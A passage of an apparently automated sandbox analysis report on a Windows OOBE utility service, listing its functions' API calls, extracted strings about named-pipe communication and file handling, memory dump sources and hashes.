                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandleObjectSingleSleepWait
                                                                                                                                                                                                                                                                    • String ID: CreateIPCChannel failed for pipe %s$Failed in creating client thread$Failed in initial handshake with the client$Failed to sent communnication ID packet to the client$Initializing Communication Channel with ACC with pipename: %s$Problem initializing Communication Channel. Quitting. Error code %d$Sent communnication ID packet to the client$Successfully created the client thread$failed to create a new thread for ipc communications. Fatal Error$thread failed to resumed. fatal error
                                                                                                                                                                                                                                                                    • API String ID: 640476663-1070437462
                                                                                                                                                                                                                                                                    • Opcode ID: 68fa43ea2eba1087806099fb0bd63b4327f9badd3dddcdc44e0fb38c4a85424d
                                                                                                                                                                                                                                                                    • Instruction ID: dce432d37da255bfcb33f67ab20813508531a13952796c9d494c823ab279c1dd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68fa43ea2eba1087806099fb0bd63b4327f9badd3dddcdc44e0fb38c4a85424d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0A1D2B0A40615AFCB00DF65DC86B6E7BA4FF49704F10017AE505AB3D1DB78A914CB9A
                                                                                                                                                                                                                                                                    Function 00401A30 Relevance: 24.8, APIs: 5, Strings: 9, Instructions: 268synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000001,?,00401A1C), ref: 00401AC7
                                                                                                                                                                                                                                                                      • Part of subcall function 00401770: SetServiceStatus.ADVAPI32(004C8C64), ref: 00401821
                                                                                                                                                                                                                                                                      • Part of subcall function 00401770: GetLastError.KERNEL32 ref: 00401877
                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401520,00000000,00000000,00000000), ref: 00401B0D
                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00401A1C), ref: 00401C91
                                                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,00401A1C), ref: 00401C99
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00401A1C), ref: 00401D13
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$CloseCreateEventHandleObjectResetServiceSingleStatusThreadWait
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in DestroyEvent $NULL OOBE_Event_t object passed in WaitforEvent $OOBEEvents$OOBEUtils$SvcInit: Creat thread failed$SvcInit: Create thread successful$SvcInit: Finished$SvcInit: Now wating for the close signal$SvcInit: Started New
                                                                                                                                                                                                                                                                    • API String ID: 2548555128-2125176678
                                                                                                                                                                                                                                                                    • Opcode ID: fdb8e43f0c7796d05782fa09c5a4e7a52c29433dbb338b57c4b152e7f49b068c
                                                                                                                                                                                                                                                                    • Instruction ID: f73ab4652ae81edbc98d7fd2a5d95e0b0f6ab9935acceea9d8e153ccbd849a11
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fdb8e43f0c7796d05782fa09c5a4e7a52c29433dbb338b57c4b152e7f49b068c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9291D370B80315ABE710DB559D46B5E3BA4EB10B14F14017BF915B73D1EFB8A9008BAE
                                                                                                                                                                                                                                                                    Function 00427320 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 148fileCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,00000000,0040674D), ref: 0042732E
                                                                                                                                                                                                                                                                    • PathIsDirectoryW.SHLWAPI(00000000), ref: 00427347
                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 0042735A
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0042736C
                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 00427386
                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00427420
                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 00427431
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00427456
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004274A6
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: File$ErrorLast$AttributesDeletePath$DirectoryExists
                                                                                                                                                                                                                                                                    • String ID: Failed to delete file: '%s' LastError:%d$File '%s' is with read-only. Its attribute is: '%d'. UnSetting its read-only attr and retry deleting$FileUtils$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 2466363971-4107796821
                                                                                                                                                                                                                                                                    • Opcode ID: 00b6d3bf9a951ad68e80268370d137a51b95931526897c450c14d293331eb804
                                                                                                                                                                                                                                                                    • Instruction ID: 1d99e2006965ff6694df6736826d9ecfdb84e75553d3c6a76360acde75f41734
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00b6d3bf9a951ad68e80268370d137a51b95931526897c450c14d293331eb804
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3341A530745221EBCA10DF19FD99A5A7B65FB85B01BA40477F80197290DB78BC90CBBD
                                                                                                                                                                                                                                                                    Function 00427AB0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 182encryptionmemoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WinVerifyTrust.WINTRUST(000000FF,?*@`J,?,BB40E64E,?,?), ref: 00427B84
                                                                                                                                                                                                                                                                    • WTHelperProvDataFromStateData.WINTRUST(00000000), ref: 00427B95
                                                                                                                                                                                                                                                                    • WTHelperGetProvSignerFromChain.WINTRUST(00000000,00000000,00000000,00000000), ref: 00427BAA
                                                                                                                                                                                                                                                                    • WTHelperGetProvCertFromChain.WINTRUST(00000000,00000000), ref: 00427BCA
                                                                                                                                                                                                                                                                    • CertGetNameStringW.CRYPT32(?,00000004,00000000,00000000,00000000,00000000), ref: 00427C07
                                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000), ref: 00427C22
                                                                                                                                                                                                                                                                    • CertGetNameStringW.CRYPT32(?,00000004,00000000,00000000,00000000,?), ref: 00427C41
                                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 00427C6A
                                                                                                                                                                                                                                                                    • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,00000034), ref: 00427D07
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CertFromHelperProv$ChainDataLocalNameStringTrustVerify$AllocFreeSignerState
                                                                                                                                                                                                                                                                    • String ID: 4$?*@`J${|}
                                                                                                                                                                                                                                                                    • API String ID: 318076659-843163469
                                                                                                                                                                                                                                                                    • Opcode ID: 2b2f03a0b2219b9638c237f0a50e4636c7e99644d9adfce77a164d3a7e6bd346
                                                                                                                                                                                                                                                                    • Instruction ID: 07a7e49040c28470832a96e5ee50d6d3bb65460ac79225f476d81bb8c7a89be8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b2f03a0b2219b9638c237f0a50e4636c7e99644d9adfce77a164d3a7e6bd346
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69717BB0E00218AFEB14DFA5DD89B9EBBB8FB04314F10416EE515AB281DBB95944CF58
                                                                                                                                                                                                                                                                    Function 0041E190 Relevance: 19.8, APIs: 6, Strings: 7, Instructions: 309COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?), ref: 0041E231
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0041E288
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0041E2DC
                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0036EE80), ref: 0041E302
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0036EE80), ref: 0041E37D
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000009), ref: 0041F2F9
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                    • String ID: CommBridge$Inside initCommBridge, creating pipe %s$OOBEUtils$Pipe already initialized.$Pipe name is empty.$Wrong pipe context passed %i.$\\.\pipe\
                                                                                                                                                                                                                                                                    • API String ID: 2978645861-1085201787
                                                                                                                                                                                                                                                                    • Opcode ID: 2741faf5fde62311bba358750df085c702bd52d97c66e27c1744663fa93f332a
                                                                                                                                                                                                                                                                    • Instruction ID: aaa71bcc0c1ad3f749e7ec319ae41c39833817b2d272478ea5ed4507fdbc246a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2741faf5fde62311bba358750df085c702bd52d97c66e27c1744663fa93f332a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CA10134700300ABDB24DF66DC9AF9A77A8AB05701F14056FE905972D1DB78F990CBAE
                                                                                                                                                                                                                                                                    Function 004274E0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 427fileCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,BB40E64E,?,00000000,?,?,?,00000000,0049994D,000000FF,?,00406D2F), ref: 0042751A
                                                                                                                                                                                                                                                                      • Part of subcall function 004270D0: PathRemoveFileSpecW.SHLWAPI(00000000,?,?,?,?,?,?,00000000,0049994D,000000FF), ref: 0042714C
                                                                                                                                                                                                                                                                      • Part of subcall function 00427260: PathFileExistsW.SHLWAPI(?,?,0040653E), ref: 0042726E
                                                                                                                                                                                                                                                                      • Part of subcall function 00427260: PathIsDirectoryW.SHLWAPI(?,?,0040653E), ref: 00427283
                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000000,0049994D,000000FF), ref: 004275CB
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,0049994D,000000FF), ref: 004275E9
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,0049994D,000000FF), ref: 00427637
                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000,0049994D,000000FF), ref: 00427678
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: File$Path$ErrorExistsLast$AttributesCopyDirectoryRemoveSpec
                                                                                                                                                                                                                                                                    • String ID: Failed to copy file at the destination:'%s'. LastError: %d$FileUtils$OOBEUtils$Source file does not exist in CopyFileFromSourceToDestination
                                                                                                                                                                                                                                                                    • API String ID: 3678581443-2441349454
                                                                                                                                                                                                                                                                    • Opcode ID: 3b2b4e70207e77957e346cfaaefa40b7f30fec250b144c30194b88bdfa61c5ea
                                                                                                                                                                                                                                                                    • Instruction ID: 304be064ac5706b44c2d59a599f2d95f36f10b52853653852536ae88b2003d00
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b2b4e70207e77957e346cfaaefa40b7f30fec250b144c30194b88bdfa61c5ea
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAE1F471F002249BCB14DF69ED85BAEB7B5FB45710F50422EE411A7390DB38AD41CBA9
                                                                                                                                                                                                                                                                    Function 0041F360 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 146filesleepCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?), ref: 0041F38A
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?), ref: 0041F39F
                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,?,?,?,00000000,?,?,?), ref: 0041F3B6
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,00000000,?,?,?), ref: 0041F3CC
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?), ref: 0041F3D6
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFileLastWrite$Sleep
                                                                                                                                                                                                                                                                    • String ID: CommBridge$Number of retries to write to pipe exhausted with last error = %lu. Aborting write on pipe %p$OOBEUtils$Write failed or else (No of bytes written > data). Aborting write on pipe %p , errno: %lu
                                                                                                                                                                                                                                                                    • API String ID: 2338600601-2345992799
                                                                                                                                                                                                                                                                    • Opcode ID: b8e0a7f11eae0cb03ddd70be310acbc4cd459f475ee6759fc557cd37cf45340b
                                                                                                                                                                                                                                                                    • Instruction ID: bbdbd7131a9a05eaf625d8743bffc745cebe138b644272fe07d0d675cb0cef45
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8e0a7f11eae0cb03ddd70be310acbc4cd459f475ee6759fc557cd37cf45340b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13411635B00208BBDB10DFA69C42BBF7B68EB55721F1001BBF815A32C0DA746D4087A8
                                                                                                                                                                                                                                                                    Function 004163F0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 155COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,?,00000000,00404D5E,?), ref: 00416418
                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000001,00000000,00000000), ref: 004164B4
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004164CB
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041651E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
